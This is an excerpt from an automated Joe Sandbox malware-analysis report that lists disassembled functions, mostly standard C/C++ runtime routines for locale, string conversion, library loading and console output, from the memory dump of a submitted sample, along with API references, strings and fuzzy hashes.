Instruction ID: fb457aed68ce280f2a9f7e52747409e651b03c7fcf290ed501af27e3c0a4c1f5
Opcode Fuzzy Hash: 2ddae219ad3fbfedad312da17c61f87d56f22937ee49a5874b2996002de595c5
Instruction Fuzzy Hash: ED71097290020AABDF209F94EC92FBE77BA9F55710F25003DED14AB281D775DC2287A1

Function 001590DD Relevance: 12.2, APIs: 8, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00159126
__alloca_probe_16.LIBCMT ref: 00159152
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00159191
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001591AE
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 001591ED
__alloca_probe_16.LIBCMT ref: 0015920A
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0015924C
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0015926F

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: a6ab3509f6e97518a61761a21e8fa397bdf3f971e8b4ea9141e181ba72f05dc9
Instruction ID: 67dfbf5b47a7469076aea80f24ed68d8951a213c99eabd0836b5a3bddcd9e958
Opcode Fuzzy Hash: a6ab3509f6e97518a61761a21e8fa397bdf3f971e8b4ea9141e181ba72f05dc9
Instruction Fuzzy Hash: F251AC72900216FBEF209F60CC84FAA7BB9EB40752F154529FD25AE190DB308D59CBA1

Function 00164C0E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,739AB969,?,00164D1B,?,?,?,00000000), ref: 00164CCF

Strings

ext-ms-, xrefs: 00164C79
api-ms-, xrefs: 00164C65

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 7320e380857042ace6f4f93382c48f8f84734dd09bcd52ebf09159eeb96927b1
Instruction ID: db5778b4c433c461bfcda114a11af20b7e46072ac731a747d182744b32dec95a
Opcode Fuzzy Hash: 7320e380857042ace6f4f93382c48f8f84734dd09bcd52ebf09159eeb96927b1
Instruction Fuzzy Hash: C2212932A03211EBC7219F60EC41E9A7778FB55760F250114FD1AA7391E732EE61D6E0

Function 0015753D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00157544
std::_Lockit::_Lockit.LIBCPMT ref: 0015754F
std::_Lockit::~_Lockit.LIBCPMT ref: 001575BD

Part of subcall function 001576A0: std::locale::_Locimp::_Locimp.LIBCPMT ref: 001576B8

std::locale::_Setgloballocale.LIBCPMT ref: 0015756A
_Yarn.LIBCPMT ref: 00157580

Strings

`qu, xrefs: 00157554

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID: `qu
API String ID: 1088826258-2715672374
Opcode ID: aa70f8dc732f85b8d9fe24648bf0215f819d2abb33a1de6734e7201f7c68a1fc
Instruction ID: ea09f9610239383faf5158f9c6817a004aec054873fc49fc8b12629fb6957b49
Opcode Fuzzy Hash: aa70f8dc732f85b8d9fe24648bf0215f819d2abb33a1de6734e7201f7c68a1fc
Instruction Fuzzy Hash: 1201B175A05110DBD705EF20E85297C7BB2BF90301B144008ED255F381DF34AE89CBD6

Function 0015CA3A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0015CA31,0015B003,00156E40,739AB969,?,?,?,00000000,00170E82,000000FF,?,001557DE,?,?), ref: 0015CA48
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0015CA56
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0015CA6F
SetLastError.KERNEL32(00000000,?,0015CA31,0015B003,00156E40,739AB969,?,?,?,00000000,00170E82,000000FF,?,001557DE,?,?), ref: 0015CAC1

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 812b7baccfe7c67066161e88da00a57276db32a8557221fbd948aae026dc3da0
Instruction ID: a35faffa61faa786bc97e087d16ac013037311daf5ada882a266e3042c2c8824
Opcode Fuzzy Hash: 812b7baccfe7c67066161e88da00a57276db32a8557221fbd948aae026dc3da0
Instruction Fuzzy Hash: 8901DD32208315DD96249B74BC8991A7F95EB22377730032AFD355E5E0FF924C49D284

Function 00161F3A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,739AB969,?,?,00000000,001710A9,000000FF,?,00161ECA,?,?,00161E9E,00000016), ref: 00161F6F
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00161F81
FreeLibrary.KERNEL32(00000000,?,00000000,001710A9,000000FF,?,00161ECA,?,?,00161E9E,00000016), ref: 00161FA3

Strings

mscoree.dll, xrefs: 00161F68
CorExitProcess, xrefs: 00161F79

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 6c6146eb1af3ae5c5de18c4b52a206bf1e54782733905bf29f37e5abb7a61bd8
Instruction ID: f6e7d926e7afd932a72c47d4c15953580602d7eb46af787181398ca5cba76c42
Opcode Fuzzy Hash: 6c6146eb1af3ae5c5de18c4b52a206bf1e54782733905bf29f37e5abb7a61bd8
Instruction Fuzzy Hash: A301DB31944719FFDB019F54DC09FBEBBBDFB04711F044625F825A2690DB759940DA90

Function 001664EC Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00166573
__alloca_probe_16.LIBCMT ref: 00166634
__freea.LIBCMT ref: 0016669B

Part of subcall function 001653D2: HeapAlloc.KERNEL32(00000000,?,?,?,0015970C,?,?,0015193D,?,?,00172C5E,?,?), ref: 00165404

__freea.LIBCMT ref: 001666B0
__freea.LIBCMT ref: 001666C0

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: fbcd06da6ae95346124a848247f1f06cd7a7a30ab0d6fa2062ee8aa2cc3b5f0d
Instruction ID: 463bd9a5662c4cf51857567e6456759419d3366d21200c525d416b5c78036531
Opcode Fuzzy Hash: fbcd06da6ae95346124a848247f1f06cd7a7a30ab0d6fa2062ee8aa2cc3b5f0d
Instruction Fuzzy Hash: 0051AE72600216AFEF259F65EC82EBF7AA9EF54350F150229FD05DA250EB71CC3087A1

Function 00157029 Relevance: 7.6, APIs: 5, Instructions: 116threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0015703D
AcquireSRWLockExclusive.KERNEL32(?,?,00000000,?,001553D4,?,?,?,?,?), ref: 0015705C
AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,?,001553D4,?,?,?,?,?), ref: 0015708A
TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,?,001553D4,?,?,?,?,?), ref: 001570E5
TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,?,001553D4,?,?,?,?,?), ref: 001570FC

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: AcquireExclusiveLock$CurrentThread
String ID:
API String ID: 66001078-0
Opcode ID: a29852e00872ec018c729017ed4914c6dc169d4017097355161505efb3a4e1bf
Instruction ID: 562946da16faa3abbfe30764efbac5052c1c3bad3718fa01ed84577431b12fbe
Opcode Fuzzy Hash: a29852e00872ec018c729017ed4914c6dc169d4017097355161505efb3a4e1bf
Instruction Fuzzy Hash: 58417170508A06DFCB25DF65E4C296AF3F5FF05312B104919E866DB5C0E730E989CB90

Function 00157C3F Relevance: 7.6, APIs: 5, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00157C46
std::_Lockit::_Lockit.LIBCPMT ref: 00157C50

Part of subcall function 001533F0: std::_Lockit::_Lockit.LIBCPMT ref: 001533FF
Part of subcall function 001533F0: std::_Lockit::~_Lockit.LIBCPMT ref: 0015341A

codecvt.LIBCPMT ref: 00157C8A
std::_Facet_Register.LIBCPMT ref: 00157CA1
std::_Lockit::~_Lockit.LIBCPMT ref: 00157CC1

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
String ID:
API String ID: 712880209-0
Opcode ID: f6ae73c44014452c956c371522e22a05813dbafa262189a989aa4905a83b1a2a
Instruction ID: 0212c47de92589dcc03520475ac5268c2a775f23e245ed0aadd48614aaddd74a
Opcode Fuzzy Hash: f6ae73c44014452c956c371522e22a05813dbafa262189a989aa4905a83b1a2a
Instruction Fuzzy Hash: 0B11A271904215DFCB05EB68D8426AEB7B5BF54722F64044DEC35AF681DB70EA088BD1

Function 0015DB32 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,0015DAE3,?,?,00000000,?,?,?,0015DC0D,00000002,FlsGetValue,001750C0,FlsGetValue), ref: 0015DB3F
GetLastError.KERNEL32(?,0015DAE3,?,?,00000000,?,?,?,0015DC0D,00000002,FlsGetValue,001750C0,FlsGetValue,?,?,0015CA5B), ref: 0015DB49
LoadLibraryExW.KERNEL32(?,00000000,00000000,0017CC7C,ios_base::failbit set,00000000), ref: 0015DB71

Strings

api-ms-, xrefs: 0015DB56

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: fb683d2870d06f67c207c409545004fa6326117832e18b25f8e6467ea7c69b48
Instruction ID: 3195517e27fedbfc6ecab48343c9bb34d32a8f63d3dab42faa33f4b5cbaf52c9
Opcode Fuzzy Hash: fb683d2870d06f67c207c409545004fa6326117832e18b25f8e6467ea7c69b48
Instruction Fuzzy Hash: D9E0B871680205F7DF201B61EC06F593F76BB12B51F154020FD1CAC4E1E766999496D5

Function 00166AB5 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(739AB969,00000000,00000000,00000000), ref: 00166B18

Part of subcall function 00169574: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00166691,?,00000000,-00000008), ref: 00169620

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00166D73
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00166DBB
GetLastError.KERNEL32 ref: 00166E5E

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: b9dbb6d6b38afd078987e604b9d2316357174724655b27d9914df36fa023a0bf
Instruction ID: 47effd9e990d38abbcb91532cb8b7a9bd522c1dc93f710a1f30ad43ebb9f94b7
Opcode Fuzzy Hash: b9dbb6d6b38afd078987e604b9d2316357174724655b27d9914df36fa023a0bf
Instruction Fuzzy Hash: 4DD148B5E00258DFCF15CFA8D8809ADBBB5FF49304F18812AE865EB351D731A956CB50

Function 00154740 Relevance: 6.2, APIs: 4, Instructions: 169COMMON

Download Yara Rule

APIs

std::_Throw_Cpp_error.LIBCPMT ref: 001547F6
std::_Throw_Cpp_error.LIBCPMT ref: 00154801
std::_Throw_Cpp_error.LIBCPMT ref: 00154905
std::_Throw_Cpp_error.LIBCPMT ref: 00154910

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: Cpp_errorThrow_std::_
String ID:
API String ID: 2134207285-0
Opcode ID: fe46b539dc8b7b2c6960b9db6ab09d3413bf2391604aa84ae4479e77096a6711
Instruction ID: 50eb5116b315ece798ef97fa80a69a09e10f6d81541dc63a196e80ca214a788c
Opcode Fuzzy Hash: fe46b539dc8b7b2c6960b9db6ab09d3413bf2391604aa84ae4479e77096a6711
Instruction Fuzzy Hash: AB512671804740EBE720AB70A84275ABBE45F6131AF44092DFDB60F582D771E54C87A3

Function 0015CB51 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 0015CC18
___AdjustPointer.LIBCMT ref: 0015CC3B
___AdjustPointer.LIBCMT ref: 0015CCD7

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 8576ef4553a0cf31037e1550e49a91752f714632425a1e29d1b70575efdecd7f
Instruction ID: 4c049743bc57b0c588251c0262536982d981fc35d19da87d6cd774461c8bc86d
Opcode Fuzzy Hash: 8576ef4553a0cf31037e1550e49a91752f714632425a1e29d1b70575efdecd7f
Instruction Fuzzy Hash: CB51B071604706DFDB298F64D881BBAB7A4EF14712F14462DEC298F291E731AD88CBD0

Function 00155B50 Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

APIs

InitOnceBeginInitialize.KERNEL32(001CB6EC,00000000,?,00000000), ref: 00155B61
InitOnceComplete.KERNEL32(001CB6EC,00000000,00000000), ref: 00155B84

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: InitOnce$BeginCompleteInitialize
String ID:
API String ID: 51270584-0
Opcode ID: effa4612e3d1ab009e1c690b90a32103beae60f813807c416defea871c24f0d7
Instruction ID: 69abd5a33c01d601ce8078da3ed95c262a5353582762c5dd7cf5140a70e603d2
Opcode Fuzzy Hash: effa4612e3d1ab009e1c690b90a32103beae60f813807c416defea871c24f0d7
Instruction Fuzzy Hash: 46310471A04604EFDB10EF94DC42B5AB7B9FB14722F10822AFD299B6C0D731A908CB91

Function 00169990 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 00169574: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00166691,?,00000000,-00000008), ref: 00169620

GetLastError.KERNEL32 ref: 001699F4
__dosmaperr.LIBCMT ref: 001699FB
GetLastError.KERNEL32(?,?,?,?), ref: 00169A35
__dosmaperr.LIBCMT ref: 00169A3C

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 65aad28f59a27d56f293b62a793484c6368e93f24ebc82f676ccab65a634bc4b
Instruction ID: 89008fe5324af89c9be270dd8f94fb26a30d0a2067065200ba8c4ccf4aa9b88d
Opcode Fuzzy Hash: 65aad28f59a27d56f293b62a793484c6368e93f24ebc82f676ccab65a634bc4b
Instruction Fuzzy Hash: 1D21CD31600615AF8B21AFA1CC81D6BB7EDFF24368711852DF929D7640E731EC609BE0

Function 00161164 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ea567f0fac0469091564f03c449ed5cdcbc707f955774111672ba014dbd819f
Instruction ID: e6fcfb2f8d928e518264523086ee4e3af2e0653b179df71cf85a94876baf83da
Opcode Fuzzy Hash: 1ea567f0fac0469091564f03c449ed5cdcbc707f955774111672ba014dbd819f
Instruction Fuzzy Hash: 8121C071600205BFDB21AFB1EC90DABB7BDEF253647298518F929D7250D731ED608BA0

Function 0016A926 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0016A92E

Part of subcall function 00169574: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00166691,?,00000000,-00000008), ref: 00169620

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0016A966
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0016A986

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: fdb3501433ddeec019db9192617ef9db9b9f061644c8d289e1e848db7a76211f
Instruction ID: 58bad9da824c45ca8e179ee6ca10ff4a78a26d70aec29a5781df12e6a4c77c20
Opcode Fuzzy Hash: fdb3501433ddeec019db9192617ef9db9b9f061644c8d289e1e848db7a76211f
Instruction Fuzzy Hash: 331149B1501619BFAB1127B59C8AC7F7A6CDF963A87A20015F902E2100FF30CEA19572

Function 0016F6A8 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0016E4E1,00000000,00000001,00000000,00000000,?,00166EB2,00000000,00000000,00000000), ref: 0016F6BF
GetLastError.KERNEL32(?,0016E4E1,00000000,00000001,00000000,00000000,?,00166EB2,00000000,00000000,00000000,00000000,00000000,?,00167439,?), ref: 0016F6CB

Part of subcall function 0016F691: CloseHandle.KERNEL32(FFFFFFFE,0016F6DB,?,0016E4E1,00000000,00000001,00000000,00000000,?,00166EB2,00000000,00000000,00000000,00000000,00000000), ref: 0016F6A1

___initconout.LIBCMT ref: 0016F6DB

Part of subcall function 0016F653: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0016F682,0016E4CE,00000000,?,00166EB2,00000000,00000000,00000000,00000000), ref: 0016F666

WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,0016E4E1,00000000,00000001,00000000,00000000,?,00166EB2,00000000,00000000,00000000,00000000), ref: 0016F6F0

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1935527711.0000000000173000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 0000000C.00000002.1941272226.00000000001CD000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_150000_gold.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 2ec42eb894c0b8d7eb29f78523c9e37551cd260545178ad25301bc4c02d6e4fd
Instruction ID: da347649a7222a83d3fb9ccdab46e50a7c348485a954b54591cf1ebd46b0c55e
Opcode Fuzzy Hash: 2ec42eb894c0b8d7eb29f78523c9e37551cd260545178ad25301bc4c02d6e4fd
Instruction Fuzzy Hash: A6F01C36001218BBCF232FA5EC09D993F77FF483A1B944024FA2C95530C73289B1AB91

Function 0015C840 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 0015C87F
__IsNonwritableInCurrentImage.LIBCMT ref: 0015C933

Strings

csm, xrefs: 0015C91D

Memory Dump Source

Source File: 0000000C.00000002.1934360969.0000000000151000.00000020.00000001.01000000.00000010.sdmp, Offset: 00150000, based on PE: true

Associated: 0000000C.00000002.1933168943.0000000000150000.00000002.00000001.01000000.00000010.sdmpDownload File
